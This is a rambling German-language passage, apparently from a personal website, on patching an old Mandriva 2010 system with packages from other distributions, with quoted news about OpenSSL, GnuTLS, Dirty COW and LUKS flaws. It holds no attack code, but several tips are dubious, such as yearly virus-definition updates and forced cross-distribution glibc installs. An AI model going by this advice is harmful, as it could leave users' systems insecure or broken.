nachinstallieren! Dazu zählt unabhängig vom Betriebssystem noch Router-Software, der Adobe Reader, XAMPP (Server) und Java. Neueste gepatchte Pakete, wer sie vermisst, gibts von Scientificlinux alias CentOS-6.5 und 6.7 (el5 und el6). Wer auf Nummer sicher geht, updatet zur Erkennung von Viren in E-mails und E-mail-Attachments mindestens einmal im Jahr die Virendefinitionsdatei daily.cvd desn Virenscanners clamav von http://clamav.net. Alternativ kommen zur Erkennung von Viren in E-mails auch andere simple Scanner wie bereits Anti-Spamfilter Spamassassin in Frage. Wie im Einzelnen Firefox geupdatet werden kann, beschreiben wir noch im Folgenden. Bei mdv2007 bestachen Programme zum Packen wie zip, tar und bzip2, openssl von openssl.org u.a. wegen Heartbleed - "und das ist mdv2007.0 bzw. mdv2010.0 auch schon alles": Was einmal läuft (und somit sicher ist), das läuft. Eben aufgeführte Software gehört unabhängig von der Version des Betriebssystems eigentlich immer wieder geupdatet, gepatcht und gebugfixt... Zu beachten ist, dass höhere Versionen von Firefox als 3 aufgrund des massiven Zuwachs an Quellcode von ca. 4MB auf über 70 MB der Verdunklung unterliegen, dem altbewährten Browser wie Konqueror (4.4.5/4.4.9) vorsichtshalber den Vorzug zu geben! TLS durch (Paket bzw. Tarball) gnutls macht sich insbesonders erst beim Konqueror bemerkbar, indem die Zertifikate von SSL-Verbindungen manuell per Fenster-Abfrage jeweils zu bestätigen sind oder mit ca-certificates (rpm) meist von selbst Bestätigung finden: Der Konqueror mit all seinen mannigfaltigen Möglichkeiten gefällt uns von allen Browsern und Dateimanagern nach Dolphin am besten, obwohl er ab und zu noch crasht, wird das Paket für Javascript js in unserem Fall für Konqueror-4.4.5/4.4.9 von mdv2010.2 nicht auf mindestens js-xxxx-2010.2mdv.rpm aktualisiert, Voraussetzung: Cache-Größe auf 50256 KB mindestens, notfalls JavaScript abschalten, dann crasht er unseres Wissens nur bei Facebook! Wann immer ein Update fehlschlägt, kann man Pakete der Vorgängerversionen mit "rpm -U --force --nodeps paketname_vorgängerversion" wieder reinstallieren. Eine rabiate Methode zur unabweigerlichen Löschung eines Pakets lautet: "rpm -e --nodeps Paketname". Obwohl eine Kopiersperre vor Überschreitung eines gewissen Umfangs seit dem Jahr 2000 2 GB natürlich nicht mehr besteht, empfiehlt es sich NICHT, allzu große Umfäge größer 20 GB mit Befehlen wie "cp -ax" auf einmal zu kopieren, denn das Dateisystem kann danach schlimme Fehler aufweisen! In systemsetttings unter Adobe Flash Player ist die Sicherheit beim Umgang mit dem Adobe Flash Player einzustellen. Das beste was man unserer Meinung nach machen kann, ist seine generelle Deaktivierung im Browser unter Plugins Vor der Installation eines Tarballs mit Treiberdateien checkt der Befehl "./configure --prefix=/usr" bzw. "./config --prefix=/usr" vorzugsweise von Festplatte/SSD aus meistens die jeweilige Systemumgebung ab, bevor es ein mit make compilierbares makefile erzeugt. Dennoch werden nicht immer alle Abhängigkeiten überprüft. Unter mdv2010 haben wir für die gegen Shellshock und dreifach gepatchte Bash von rpmfind.net folgende Pakete (statt fehlerhafter Tarballs von gnu.org) installiert: bash-4.1.2-33.el6.x86_64.rpm mit zugehörigem bash-completion, bash-doc, dialog, ncurses, ncurses-base und ncurses-libs von el6 -ALT Linux bzw. Scientificlinux alias CentOS 6.5 resp. 6.6. und 6.7 Updatequellen: rpm-Pakete und mit Links zu den aktuellen Tarballs: http://fr2.rpmfind.net nss, lib64nss: Der Mozilla Network Security Service (NSS) ist eine Bibliothek zur Implementierung von Sicherheitsmöglichkeiten wie SSL v2/v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME und X.509 Zertifikate. SSL und TLS, hier openssl von http://openssl.org (von dem Browser wie Konqueror Gebrauch machen), installiert ist auf unserer mdv2010 das derzeit aktuelle Tarball openssl-1.0.2d mit Folgendem nach Heartbleed hinter sich: Ähnlich wie imfalle glibc, bash (Shellshock) und Linux-Botnetzen usw.: Entwickler warnen vor Schwachstelle in OpenSSL-Verschlüsselung OpenSSL-Webseite: Der jetzt entdeckte Fehler schlummert seit Jahren in der Software, Spiegel Onine, 06.06.2014 Wenige Wochen nach der schweren Heartbleed-Sicherheitslücke taucht ein neuer Fehler in der Internet-Verschlüsselungssoftware OpenSSL auf. Die Schwachstelle ermöglicht Angreifern, den Datenstrom unbemerkt anzuzapfen - und ist seit 16 Jahren unentdeckt. Erneut ist eine Sicherheitslücke in der weitverbreiteten Online-Verschlüsselungssoftware OpenSSL aufgetaucht. Wenige Wochen nach Heartbleed hat der japanische Entwickler Masashi Kikuchi eine Schwachstelle entdeckt, die den verschlüsselten Datenaustausch über das Protokoll anfällig für Angriffe macht. Am Donnerstag teilte die OpenSSL Foundation mit, dass der Fehler für einen Man-in-the-Middle-Angriff ausgenutzt werden könne. Sprich: Ein Angreifer schaltet sich zwischen einen Rechner und einen Server, die untereinander Daten austauschen. Der Angreifer kann über die Schwachstelle den Datenstrom anzapfen, die Inhalte mitlesen und auch manipulieren, bevor er sie weiterleitet. "Dieser Fehler existiert seit der allerersten Version von OpenSSL", schreibt Masashi Kikuchi in einem Blogbeitrag. Er wirft den SSL-Experten vor, den Code nie ordentlich überprüft zu haben. Nur so sei es möglich, dass die Sicherheitslücke mehr als 16 Jahre unbemerkt im Code schlummern konnte. "Hätten die Prüfer genügend Erfahrung gehabt, dann hätten sie den OpenSSL-Code genauso testen können wie sie ihren eigenen Code testen würden". Sie hätten das Problem entdecken können, schreibt Kikuchi. Gefahr besteht demnach beim Surfen im Netz, beim Senden und Empfangen von E-Mails und selbst beim Datenaustausch über eine VPN-Verbindung. Von einem solchen Angriff bemerke der Anwender nichts. Für eine erfolgreiche Attacke muss allerdings auch der Server von dem Fehler im Code betroffen sein. Zeitgleich warnt die OpenSSL-Foundation vor sechs weiteren Schwachstellen in ihrer Software. Für alle liegen jedoch bereits Updates bereit, mit denen sich die potenziellen Probleme beseitigen lassen. Die Sicherheitslücken treten nur wenige Wochen nach der Entdeckung der OpenSSL-Schwachstelle Heartbleed auf, einem der schlimmsten Internet-Verschlüsselungsfehler aller Zeiten. Heartbleed ermöglichte es Angreifern, geheime Schlüssel, Nutzernamen und Passwörter von Servern zu stehlen. Internetnutzer sind seither aufgerufen, alle alten Passwörter für Internetdienste zu ändern. Linux-Verschlüsselung aushebeln: 70 Sekunden Enter drücken, PCWELT, 16.11.2016 In dieser Code-Zeile steckt der Fehler. Sicherheitsexperte haben in Linux eine kuriose Sicherheitslücke entdeckt. Der Angreifer braucht die Entertaste und mindestens 70 Sekunden Zeit… Mit LUKS Linux Unified Key Setup können Linux-Benutzer ihre Festplatten verschlüsseln und damit vor fremden Blicken schützen. Ubuntu bietet Ihnen diese Festplatten-Verschlüsselung während der Installation an. Wie Sie LUKS einrichten, lesen Sie in diesem Ratgeber ( weitere Einzelheiten siehe unter News&Links#Computer ) Das können wir, Gooken, bislang nicht best&aum;tigen! Nach drei erfolglosen Einloggversuchen bricht cryptsetup ab, so dass ein Neustart erforderlich ist. Der vorgestellte Patch wird an Dateien bzw. Skriptdateien vorgenommen, die bei cryptsetup (el6, rosa2014.1) nicht im Quellcode zu finden sind. Kurze Zeit spä,ter die Stellungnahme von https://gitlab.com/cryptsetup/cryptsetup/, 18.11.2016: CVE-2016-4484 (Initrd root shell): "This is problem in intramfs scripts only (these are not part of cryptsetup project), it is neiter bug in cryptsetup nor in LUKS. Some distributions could add these scripts to distributed package, please check your distro updates for more info." Sambacry: Jetzt hat Linux auch sein WannaCry, PCWELT.de 26.05.2017 In Samba wurde eine gefährliche Lücke entdeckt, die Ähnlichkeiten zu WannaCry aufweist. Dieses Mal sind also Linux-Nutzer betroffen... https://www.pcwelt.de/a/sambacry-jetzt-hat-linux-auch-sein-wannacry,3446902 Gooken.de: Ein Update liegt seitdem für CentOS 6 vor. Sicherheitslücke (Dirty Cow) im Linux-Kernel ermöglicht lokale Rechteausweitung, Pro-Linux, 24.10.2016 Eine gerade behobene Sicherheitslücke im Linux-Kernel ermöglichte es allen Benutzern, Root-Rechte zu erhalten, wenn sie Code auf dem betreffenden System ausführen konnten. Die größten Probleme an..., Einzelheiten: http://www.pro-linux.de/news/1/24096/sicherheitslücke-im-linux-kernel-ermöglicht-lokale-rechteausweitung.html. Apparmor kann also generell schützen; Aufruf von apparmor im Hintergrund aus /etc/rc.local: /usr/lib64/apparmorapplet&. Dirty COW: Torvalds patcht Sicherheitslücke im Kernel, 21.10.2016 Eine Race Condition im Speichersystems des Linux-Kernels kann ausgenutzt werden, um Root-Rechte zu erhalten. Der Dirty COW getaufte Fehler ist inzwischen in den verschiedenen Kernel-Versionen behoben. Linux-Meister Linus Torvalds hat beim Patch von Dirty COW (CVE-2016-5195) selbst Hand angelegt. Linus Torvalds schreibt an die Kernel-Mailingliste, dass es den Bug seit etwa elf Jahren gibt. Der damalige Patch wurde von Torvalds wieder verworfen, weil er Probleme mit S390-Systemen machte. Die S390-Prbleme seien aber längst behoben und eine vernünftige Patch-Lösung sei möglich, schreibt Torvalds. Dirty COW ist auch auf Github zu finden. COW steht in diesem Fall für copy-on-write. Phil Oester von Red Hat hatte den Bug entdeckt und auch einen Exploit dafür gefunden. Um die Lücke ausnutzen zu können, muss der Angreifer allerdings lokalen Zugang zum Linux-Rechner haben. Ist dies aber der Fall, ist der Angriff und die Rechteausweitung möglich, ohne Spuren in den Logs zu hinterlassen heißt es auf der Webseite, die dem Dirty COW-Bug von einem nicht näher bezeichneten Verfasser gewidmet wurde. Die Webseite lässt sich reichlich ironisch zum Bug aus und spielt dessen Bedeutung herunter und macht sich über über vermeintlich übertriebene Sicherheitsbedenken lustig. Der Tonfall erinnert teils an die eher geringschätzigen Einlassungen von Linus Torvalds zur Kernel-Security. Torvalds vertritt in der Regel die Meinung, dass zu viel Wind um Sicherheitslücken gemacht werde und es wichtigere Dinge am Kernel zu bearbeiten gäbe. http://www.linux-magazin.de/NEWS/Dirty-COW-Torvalds-patcht-Sicherheitsluecke-im-Kernel Diese Sicherheitslücke ist Kernel-Entwicklern seit mehreren Jahren bekannt. Da ihr eine lokale Intrusion vorausgeht, bleiben sie mit der richtigen Konfiguation von Linfw3 und msec unter dem aufgefürten level.secure kein Thema, egal, ob der Kernel gepatcht wird oder nicht. Kernel: akuteller 4.9 oder Einspielen aller Patches von 2011 bis 2016 in 2.6.39.4-5.1 (mdv2011), darunter der Dirty-Cow Patch: http://repository.timesys.com/buildsources/k/kernel/kernel-2.6.39/. Pakete für OpenSSL statt Tarball im Einzelnen: openssl (el7), openssl-libs (el7), openssl-perl (el6), perl-Crypt-OpenSSL-random (el6), perl-Crypt-OpenSSL-RSA (el6) und pyOpenSSL (el6) TLS und SSL durch aktuelles gnutls (derzeit 3.4.3) mit nettle (derzeit 3.1.1): KRYPTOGRAFIE Sicherheitslücke gefährdet Linux: Ein Leck macht Linux und hunderte Open-Source-Projekte angreifbar, ähnlich wie Apples SSL-Bug. Hacker können vorgeblich sichere Verbindungen kapern. http://www.zeit.de/digital/datenschutz/2014-03/gnutls-linux-sicherheitsluecke VON PAVEL LOKSHIN, 5. März 2014 Erst vor einer Woche sorgte Apples SSL-Lücke für Aufregung, nun hat auch die Linux-Community ein Kryptografie-Problem. "Es sieht ziemlich furchtbar aus", sagte der Informatikprofessor Matt Green der Nachrichtenseite Ars Technica. Inzwischen wurde die Sicherheitslücke geschlossen. Die Entwickler empfehlen, das betroffene Kryptografiemodul GnuTLS sofort zu aktualisieren. Für große Linux-Distributionen wie Debian, Ubuntu und Red Hat liegen bereits Updates vor. Entwickler hatten während einer Code-Analyse im Auftrag des Linux-Distributors Red Hat eine schwerwiegende Sicherheitslücke in GnuTLS entdeckt. Ähnlich wie Apples goto-fail-Lücke ermöglicht sie, dass Programme unter bestimmten Umständen fehlerhafte SSL- oder TLS-Zertifikate als gültig akzeptieren. Offenbar bestand die Sicherheitslücke in GnuTLS seit 2004. Solche Zertifikate weisen die Identität von Webseiten nach und ermöglichen verschlüsselte Verbindungen. Dank der Sicherheitslücke können Hacker die Zertifikate manipulieren und vorgeblich sichere und verschlüsselte Web-Verbindungen kapern. Betroffen sind unter anderem das populäre Desktop-Linux Ubuntu und die Serverdistribution Red Hat. Android benutzt für verschlüsselte Web-Verbindungen OpenSSL statt GnuTLS. Nutzer des mobilen Betriebssystems von Google haben von der Sicherheitslücke also nichts zu befürchten. Mehr als 200 Programme betroffen: Nun spekulieren Nutzer, dass mehr als 200 Open-Source-Betriebssysteme und Programme betroffen sein könnten, darunter das Linux-Drucksystem von Apple inc. namens CUPS und Teile der Linux-Desktopumgebung GNOME. Andere Schätzungen gehen von etwa 350 betroffenen Programmen aus. Die Entwickler von GnuTLS sprechen von einem "wichtigen und zugleich peinlichen Bug". "I told you so", ich habs euch doch gesagt, schrieb Howard Chu auf Twitter. Bereits 2008 hatte der Open-Source-Entwickler davon abgeraten, GnuTLS einzusetzen. Der Code von GnuTLS sei "grundlegend kaputt" und die Entwickler seien "zu naiv und unerfahren, um das zu erkennen". Pakete für gnutls i.e.: gnutls (el7), gnutls-c++ (el7), gnutls-dane (el7), gnutls-utils (el7), ldns (el6), libtasn1 (el7), libtasn1-tools (el7), nettle (el7), p11-kit (el7), p11-kit-trust (el7), trousers (el6), unbound-libs (el6), xmlsec1 (el6), xmlsec1-gcrypt (el6) und xmlsec1-gnutls (el6) mbedtls (el7, el6): Light-weight cryptographic and SSL/TLS library certificates, sicher: TLS mit SHA2 und nicht SSL und/oder SHA1: sha2-1.0.1-1.el6.nux.x86_64 (el6) und perl-Digest-SHA2-1.1.1-1.el6.rf.x86_64 (el6) ca-certificates, p11kit, p11kit-trust und celtx-ca, anstelle vergleichweise schwach bestückter root-certificates und somit allesamt von (Scientificlinux alias CentOS 6.7 oder auch ALT Linux) el6: von fr2.rpmfind.net zur Ergänzung von openssl und gnutls: für Fälle, in denen der Name der Website nicht mit dem des Zertifikats übereinstimmt, das Zertifikat abgelaufen ist oder ein passendes Stammzertifikat fehlt - sprich: das Zertifikat von einer Stammzertifizierungsstelle beglaubigt worden ist, die Ihr Browser nicht kennt. Ohne installiertes "ca-certificates" erweist sich eine ausdrückliche Bestätigung des Zertifikats seitens des Surfers mit dem Aufruf einer Webseite unmmittelbar vor dem Aufbau einer verschlüsselten Verbindung zum Schutz vor Hackern und Phishing so gut wie jedesmal, auch wiederholt, manuell als zwingend erforderlich - ca-certificates vorzugsweise zu installeren. [ SOLVED by Gooken ]: Bei jedem Webseiten-Aufruf sind Zertifkate auch im Falle der Dauerhaftigkeit neu zu bestätigen. cd /etc/pki/tls/certs und eneuere die ins Leere oder auf entfernte Stelle verweisende ca-bundle.crt, indem die Sicherung oder desgleichen aus demselben Verzeichnis auf sie kopiert wird: cp -fp ca-bundle.crt.rpmnew ca-bundle.crt. manpages, die neuesten Benutzerhandbücher in möglichst eigener Landessprache, und xz mit lib64lzma (omv2015), der Nachfolger von lzma, u.a. für den lzma-Kernel und die neuen, um das Fünffache umfangreichere Manpages (wie in unserem Fall ursprünglich für Mageia Caudron 6, mga6): http://tukaani.org/xz/ oder als Paket fr2.rpmfind.net: man-pages-de (aktuelle Distribution wie derzeit mga6). Änderungen in der Sektion Dekomprimierung sind in /etc/man.config vorzunehmen: Zeile ".lzma /usr/bin/xz --format=alone --decompress --stdout" und Zeile ".xz /usr/bin/xz --format=xz --decompress --stdout". Trotzdem arbeitet xz vom Tarball möglicher Weise gar nicht oder fehlerhaft. In diesem Fall installiere man einfach das rpm xz für die Installierte Distribution wie hier mdv2010 neu: "rpm -i --force xz-Version-Release.Update.rpm.". Nun kann man mittels Befehl "man Befehl" von mdv2010 die vielen neuen aktuellen man-pages-de lesen wie derzeit die aktuellsten manpages auf deutsch von Mageia Caudron 6, mga6 ) Anonymisierungsnetzwerke: tor (el6, last modified 2015-12-11, actual date: 2016-01-18), torsocks (el6), jondo (el6, jap) PC+Mobil / Linux Weitere Artikel Test: Webbrowser für Linux, tecchannel.de, 18.12.2001 (aktualisiert) | von Jörg Luther Konqueror: Browser Browsen mit dem Konqueror ist eine sichere Sache. Beim Implementieren der Privacy- und Security-Funktionen haben die KDE-Programmierer vorbildliche Arbeit geleistet. So lassen sich etwa Java und Javascript nicht nur generell deaktivieren: Je nach URL kann man beide einzeln zulassen oder ihre Ausführung unterbinden. Bei der Cookie-Verwaltung leistet der Konqueror ähnliches. Vorbildlich: Konqueror bietet fein abgestufte, umfassende Möglichkeiten zur Behandlung von Cookies, Scripts und Applets. Neben der generellen Ablehnung und dem Unterbinden von 3rd-Party-Cookies ermöglicht der Browser eine domainbasierte Behandlung der Datenpäckchen. Bei entsprechender Einstellung nimmt der Browser die Eintragungen während des Surfens per einfachem Mausklick vor. In Kombination mit OpenSSL kann man mittels Konqueror gesicherte Verbindungen via SSL 2.0 / 3.0 sowie TLS 1.0 aufbauen. Hier lassen sich Verschlüsselungsstärken bis 168 Bit wählen. Der Konqueror kann jedoch nicht nur in Sachen Sicherheit glänzen, sondern gibt sich inzwischen auch in punkto Verwaltung komfortabel. So lassen sich Bookmarks nun wie aus anderen Browsern gewohnt setzen und verwalten. Auch eine History liefert der Browser, die sich ebenso wie die Bookmarks über eine bequeme Seitenleiste erreichen lässt. Zudem beherrscht er das automatische Komplettieren von URLs und die grundlegenden Optionen zur Cache-Verwaltung. Zwar bietet Konqueror selbst weder E-Mail noch HTML-Editor, liefert jedoch komfortable Schnittstellen zu den entsprechenden Anwendungen aus dem KDE-Fundus. Fazit: Wer keine umfassende Websuite sucht, sondern lediglich einen leistungsfähigen Browser, wird bei Konqueror fündig. In der aktuellen Version 2.2.2 nimmt der KDE-Browser es problemlos mit jeder Konkurrenz auf. Konqueror: 4.4.5/4.4.9(mdv)/4.4.4(OpenSuSE)/4.3.5(el6) von mdv2010.2 gilt wie Konqueror von mdv2010.0 als stabil und sicher, liegen Webseiteninhalte innheralb seiner Normen. Ein Upgrade des Konqueror gilt ähnlich wie bei Dolphin als ziemlich aufwendig, da in diesem Fall jede Menge Bibliotheken von KDE der Aktualisierung bedürfen. Einzelheiten siehe News&Links unter Computer. Es lassen sich aber Kernkomponenten updaten wie Browser-Widget khtml (el6), kparts und kget. Was genau zu tun ist, beschreiben wir noch. Zunächst seine herausragenden Eigenschaften: Eigenschaften von Konqueror seit Version 3.x.x geschrieben in Qt3, Qt4, C und C++ Leistungsstarker Dateimanager und Webbrowser Standardkomponente Qt-Browser-Widget und daher Browser-Engine KHTML SSL 2.0 / 3.0 sowie TLS 1.0 mit SHA-1 und sicherem SHA-2 SSL vs. TLS vs. STARTTLS | Blog | Limilabs http://www.limilabs.com/blog/ssl-vs-tls-vs-starttls-stls tls steht für Transport Layer Security und die gängige Version lautet 1.2. tls ist der Nachfolger von ssl. Obwohl tls im Namen STARTtls vorkommt, heißt es nicht, dass tls verwendet wird. Beides, ssl und tls, sind akzeptierbare Protokolle für die Absicherung der Kommunikation. Embedded viewing of files thanks to KParts Multiple split views and tabs Sidebars and extensions to provide additional functionality Integration with other KDE applications like KGet Download Manager and Akregator Feed Reader Remote and pseudo-filesystem file management through KIO Werden Sie für immer von allen Sorgen mit dem Browser befreit, indem der beliebte Linux-Sandardbrowser - und Dateimanager einer Aktualisierung widerfährt: KDE: kdeplasma-addons (el6), kdeplasma-addons-libs (el6) and lib64kexiv2 (mdv2010, KDE 4.3.4) Chromium, für alle, die Konqueror und Firefox nicht die Wahl ist: GLSA >= 44357.130, Tarball von http://code.google.com/p/chromium/downloads/list? can=1& q=&colspec= Filename+Summary+Uploaded+ ReleaseDate+Size+DownloadCount Aktuelle Updates für mdv2010 finden sich wie gesagt nach dem Upgrade der GNU C Bibliothek (glibc) auf mindestens mdv2012 auf Gentoo-GLSA wieder oder alternativ auch ohne neu installierte glibc auf fr2.rpmfind.net für Scientificlinux alias CentOS bzw. ALT Linux sprich el6 wie auch einzelne Tarballs unterschiedlicher Anbieter-Webseiten. Blindlings sollte man wie gesagt trotzdem nichts davon installieren! mdv-pakete rechnen sich auf plus 2 bis Jahre später, bei mdv2010 also bereits auf das Jahr 2013. Außerdem braucht man mit einer Firewall wie Linfw3 strenggenommen nur den Browser und TLS/SSL updaten! Auch die glibc selbst sollte auf einem sicheren Stand sein: http://www.pcwelt.de/news/GLIBC-Linux-Sicherheitsluecke-entdeckt-9933502.html (PC-WELT.de, 18.02.2016). Nach dem Upgrade der glibc auf el8, pclos oder rosa2014.1 ist ein Update u.a. von dieser Stelle möglich: http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/main/updates/ . Damit Programme wie miro und gftp weiterhin laufen empfiehlt sich nun glbc (pclos) oder folgendes Update als Mix aus Rosa (glibc-Paket) und konsequent durchgepatchtes el6 (Rest der glibc-Pakete): glibc (el8, pclos, rosa2014.1), glibc-common (el8), glibc-headers (el8, pclos), glibc-all-langpacks (el8), Rest el6: compat-glibc (el6, ohne weitere Maßnahmen nach der Intallation!), glibc-common (el8, el6), glibc-static (el6), glibc-utils (el8, el6) und glibc-headers (el6). glibc (el8, pclos, Brother (i586-driver only): glibc (2.22, el6, i586, bzw. in /lib entsprechend verlinken und löschen!)), LUKS/dm-crypt (cryptsetup (pclos, rosa2014.1, fc, el6, ...)) https://security.gentoo.org/glsa/, Gentoo.org, 20.09.2015, https://infra-status.gentoo.org/: "Web Services Maintenance The following web services are currently unavailable: security.gentoo.org (GLSA) piwik.gentoo.org (this will cause other gentoo websites to exhibit a ´never stops loading´behavior) overlays.gentoo.org We expect the services to return shortly." Audio-/Video-Codecs: libavcodec52, libavcodec53, faad2 (mp2, mpeg4), faad-libs, fame, libfame (mpeg1), mpeg4 bzw. divx), libmpeg2, libmeg3, libmpg123, libquicktime, ogg, vorbis, mikmod, theora, mplayer-codecs, mplayer-codecs-extra, win-codecs-all, ffmpeg-codecs, v4l-utils (el7, el6), libv4l (el7), ... Wir listen (ohne Anspruch auf Vollständigkeit) die für mdv2010 und weitere Linux-Distributionen infrage kommenden GLSA-Sicherheitsupdates und viele weitere Pakete mit Updates, Patches und Bugfixes auf dieser Webseite auf: Dateisystem, möglich sind: reiserfs (OpenSuSE 15.0, 15.1, Thumbleweed), reiserfsprogs (omv2015, omv2014) oder reiserfs-utils (fc23, el7, el6), e2fsprogs (1.43.2), lib64ext2fs (rosa2014.1) oder e2fsprogs-libs (el7, el6), uclibc-reiserfsprogs (omv2014), uClibc (omv2014, omv2015), uclibc-lib64ext2fs (omv2014, omv2015), uclibc-lib64uuid1 (omv2014), libcom_err (fc23, el7) und libss (fc23, el7); Die Festplatte (SSD) meldet unter manchen Reiserfs-Versionen Fehler. Sie lassen sich natürlich beheben. Vermutlich lags am Kernel (mdv-2.6.39) oder der glibc (el8, pclos, rosa2014.1). reisersfsprogs (mdv2011 und rosa2014.1) bewirken eine Fehlermeldung mit Signal 11 beim Booten und Check mit reiserfsck. Unsere Wahl fiel alles in allem auf die gepatchte reiserfsprogs (omv2014) und e2fprogs (rosa2014.1) mit lib64ext2fs (rosa2014) ohne uClibc (omv2014) und uclibc-lib64ext2fs (omv2014): fehlerfrei, daraufhin auch auf Kernel-4.9 (PCLinuxOS). glibc (el8, pclos, Brother (i586-driver only): glibc (2.22, el6, i586, bzw. in /lib entsprechend verlinken und löschen!)), LUKS/dm-crypt (cryptsetup (pclos, rosa2014.1, fc, el6, ...)) hdparm (fc29, omv2015, rosa2014.1, el7, ggfls. auch el6) und sdparm (fc29, omv2015, rosa2014.1, el7, el6) unterstützen unser Ziel: alles auf SSD und mausklick-schnell bzw. leichtläufig (/etc/rc.local mit Eintrag "hdparm -W010A0 /dev/sda"). MCC, gparted und der Disk Manager Palimpsest verschafft Übersicht, Benchmark, manch Verwaltung und Partitionierung. Zu entfernen (mit rpm -e) sind von mdv2010: tracker, codeina, mdkonline, billreminder und rkhunter. Cups: Das Computersystem ggfls. ganz zu Anfang gleich zweimal neustarten, dann funktioniert cups spätestens. Fehlt das Icon für Klipper (mdv2010.2) in dem Systemabschnitt der Kontrollleiste, uns mal passiert, sollte lediglich qt (Qt4, el6) nachinstalliert werden. Klipper (rosa2014.1) kann anstelle klipper (mdv2010.2) auch ohne zugehörige Bibliotheken (rosa2014.1) installiert werden. KDE:KDE 4.10 (el7) bzw. KDE 4.3.4 (el6) oder KDE 4.4.4 (OpenSuSE, kukuk) zuzüglich mysql (el7 bzw. el6), akonadi (el7, el6) und nepomuk (el7, el6), ilmbase(el6, el7)); alternativ KDE 4.14 (pclos, rosa2014.1), nun zuzüglich haldaemon hal (rosa2014.1) und lib64hal (rosa2014.1) mindestens... und somit ohne Gewähr, ... oder unter Updates mit KDE (el6) und KDE (OpenSuSE) einfach KDE-4.4.5/4.4.9 von mdv2010.2 behalten, changelog kdelibs: 2015-03-25 - Lukas Tinkl <ltinkl@redhat.com> - 6:4.3.4-23 - Resolves: rhbz#1206181 - The kate editor does not retain printing preferences 2015-03-25 - Lukas Tinkl <ltinkl@redhat.com> - 6:4.3.4-22 - Resolves rhbz#1206180 - Opening a terminal in Konqueror / Dolphin does not inherit environment variables 2014-07-02 - Daniel Vrátil <dvratil@redhat.com> - 6:4.3.4-21 - Resolves bz#1025417, wallpaper not applied on second screen when on dualhead 2013-06-10 - Than Ngo <than@redhat.com> - 6:4.3.4-20 - Resolves: bz#882895, crash when switching activity of 2 desktops from activity applet 2012-10-18 - Than Ngo <than@redhat.com> - 6:4.3.4-19 - fix multilib conflict 2012-10-17 - Than Ngo <than@redhat.com> - 6:4.3.4-18 - Resolves: bz#866230, CVE-2012-4512 CVE-2012-4513 2012-09-07 - Than Ngo <than@redhat.com> - 4.3.4-17 - Resolves: bz#754161, bz#587016, bz#682611, bz#734734, bz#826114, respin 2012-08-28 - Than Ngo <than@redhat.com> - 6:4.3.4-16 - Resolves: bz#754161, stop/warn when a subdir is not accessible when copying 2012-08-22 - Than Ngo <than@redhat.com> - 6:4.3.4-15 - Resolves: bz#587016, print dialogue does not remember previous settings - Resolves: bz#682611, Konqueror splash page in zh_TW is wrong - Resolves: bz#734734, plasma eating up cpu-time when systemtray some icon - Resolves: bz#826114, konqueror crash when trying to add Terminal Emulator" to main menu bar 2012-02-02 - Than Ngo <than@redhat.com> - 6:4.3.4-14 - Resolves: bz#698286, big endian issue on s390(x) Konqueror-Update: Kann man sich in KDE nach dem Experimentieren über kdm nicht mehr einloggen, empfiehlt sich vorübergehend ein anderer Fenstermanager wie LXDE. Notfalls sind einzelne Pakete von KDE oder KDE vollständig nochmal zu installieren (rpm -U --force Paketname). Das Konqueror ist nun weitgehend up to date durchgepatcht und surft ganz einmalig und sicher. Sogar Online Banking gelingt unter Vornahme entsprechender Einstellungen wie Cookies, JavaScript enabled und BrowserUA. Die von 4.4.5 (mdv2010.2) auf 4.3.4 (el6) downgegradete Version läuft also supertop und sicher. Einziger Haken: Die Links können von unbekannt wieder auf die alten Dateien zurückgesetzt werden. Man merkt das u.a. anhand dem erneuten kurzen Ruckeln der Lesezeichen nach dem Klick auf sie in der Menüleiste. Vorsichtshalber überschreibe man daher in /usr/lib64 die aufgelisteten alten mit den neuen Dateien: "cp -f new_file old_file". alternativ: yum install konqueror (in ein Terminal eingeben), Quelle: http://konqueror.org/download/ Unerklärliche Fehlermeldungen von KDE (bei 4.4.5/4.4.9 sehr selten der Fall): notfalls KDE nachinstallieren: rpm -U --force --nodeps *4.4.5*.rpm (derartiger Fall ergab sich bei uns mit gamin (el6) statt beizubehaltendem gamin (mdv2010.2)) Der Schwachpunkt kann Mandrivas hauseigenes "net_applet" aus einem der Pakete von drakx-net (mdv2010.2) sein. Ggfls. ist die Version drakx-net (mdv2010) mit drakx (mdv2011) zu updaten... ... für mdv2010 (el6) hingegen infrage kommende Updates u.a. nach pro-linux-de (http://www.pro-linux.de/sicherheit/1/1/1.html), Updates für CentOS el6 und el7 Jahr 2010 bis dato (pgks.org), Updates für Rosa2014.1 ( http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/main/updates/und Rosa2012.1) und Gentoo GLSA (https://security.gentoo.org/glsa/), den Gentoo Linux Security Advisories, pbone (Updates für CentOS 6 u.a. von http://rpm.pbone.net/index.php3/stat/14/idka/262900/datan/2015-10-11) und falls nicht verfügbar obendrein OpenMandriva omv2013 bis omv2015 (pkgs.org), fc13 bis fc25 (fr2.rpmfind.net, pkgs.org), mga1 bis mga4 (fr2.rpmfind.net), mdv2010.1 (fr2.rpmfind.net) und mdv2010.2 (Ausgangspunkt, fr2.rpmfind.net unter mdv2010.1), mdv2011, mdv2012 (fr2.rpmfind.net), Bezugsquelle: fr2.rpmfind.net, pbone.net und pkgs.org: alle Updates mdv2010.0, zugehörige Bibliothekspakete "lib" werden nicht immer angegeben): ... das wars, wenn auch ohne Gewähr, Datum: 02.04.2016. Alles von mdv2010 kann aber nicht aktualisiert werden. Welche Pakete zu aktualisieren sind, entscheidet man nach Aufruf des Paketmanagers aus MCC. Aufgelistete Pakete dienen meist dem reinen Up-to-date-halten des Systems und somit der Aktualisierung (sicher ist sicher). Die wenigsten davon sind Sicherheitsupdates. Viele Updates sind nicht nur gepatcht sondern werden auch weiterhin akutalisiert. Nach dem Aktualisieren gilt es nun nur noch, die neuesten Aktualisierungsempfehlungen von fr2.rpmfind.net für CentOS 6 (unter Updates) und http://www.pro-linux.de/sicherheit/1/1/1.html für insbesonders für CentOS 6 bis zum Anschluss an obige Liste im Auge zu behalten. Der Vorzug liegt wie gesagt in der ab 2010 zehn Jahr kontinuierlich durchgepatchten Fixierung der Paket-Versionen des "Universal-Linux" über CentOS 6 der Form lediglich geupdateter und gepatchter Releases. Das aber gibt den Ausschlag für die IT-Sicherheit schlechthin, denn mit den neuene Versionen neuer Distributionen wiederholt sich der ganze Updatebedarf, und das meist über nur einige wenige Jahre statt gleich zehn Jahre hindurch! Programme liefen funktional schon seit 